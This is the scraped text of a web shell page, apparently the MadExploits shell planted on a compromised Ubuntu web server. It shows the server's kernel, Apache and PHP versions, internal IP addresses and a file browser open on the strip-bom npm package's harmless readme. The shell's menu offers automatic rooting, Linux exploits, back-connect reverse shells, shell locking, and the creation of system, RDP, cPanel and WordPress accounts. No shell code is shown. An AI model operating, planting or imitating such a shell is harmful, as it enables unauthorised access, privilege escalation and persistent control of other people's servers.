Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
strip-bom /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
317
B
-rw-rw-r--
license
1.09
KB
-rw-rw-r--
package.json
655
B
-rw-rw-r--
readme.md
913
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# strip-bom [](https://travis-ci.org/sindresorhus/strip-bom) > Strip UTF-8 [byte order mark](http://en.wikipedia.org/wiki/Byte_order_mark#UTF-8) (BOM) from a string From Wikipedia: > The Unicode Standard permits the BOM in UTF-8, but does not require nor recommend its use. Byte order has no meaning in UTF-8. ## Install ``` $ npm install --save strip-bom ``` ## Usage ```js const stripBom = require('strip-bom'); stripBom('\uFEFFunicorn'); //=> 'unicorn' ``` ## Related - [strip-bom-cli](https://github.com/sindresorhus/strip-bom-cli) - CLI for this module - [strip-bom-buf](https://github.com/sindresorhus/strip-bom-buf) - Buffer version of this module - [strip-bom-stream](https://github.com/sindresorhus/strip-bom-stream) - Stream version of this module ## License MIT © [Sindre Sorhus](https://sindresorhus.com)
Close